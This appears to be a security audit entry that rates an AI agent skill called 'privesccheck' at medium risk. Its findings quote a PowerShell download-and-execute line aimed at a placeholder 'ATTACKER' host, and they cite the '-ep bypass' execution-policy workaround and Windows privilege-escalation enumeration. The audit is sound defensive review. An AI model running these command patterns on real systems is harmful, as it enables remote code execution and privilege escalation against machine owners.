skills/aeondave/malskill/privesccheck/Gen Agent Trust Hub

privesccheck

Warn

Audited by Gen Agent Trust Hub on Sep 15, 2026

Risk Level: MEDIUMREMOTE_CODE_EXECUTIONPRIVILEGE_ESCALATIONCOMMAND_EXECUTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill documents an in-memory delivery pattern using IEX (New-Object Net.WebClient).DownloadString("http://ATTACKER/PrivescCheck.ps1") in both SKILL.md and references/ps-opsec-and-reporting.md. While this uses an explicit placeholder (ATTACKER), it provides a template pattern for downloading and executing arbitrary remote scripts directly in a PowerShell context.
  • [PRIVILEGE_ESCALATION]: The skill references techniques for bypassing Windows PowerShell script execution restrictions using the powershell -ep bypass command pattern in SKILL.md and references/ps-opsec-and-reporting.md.
  • [COMMAND_EXECUTION]: The skill details multiple command-line strings and automated workflows for Windows system enumeration, including service, task, and registry policy profiling via Invoke-PrivescCheck.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Sep 15, 2026, 09:56 AM
Security Audit — agent-trust-hub — privesccheck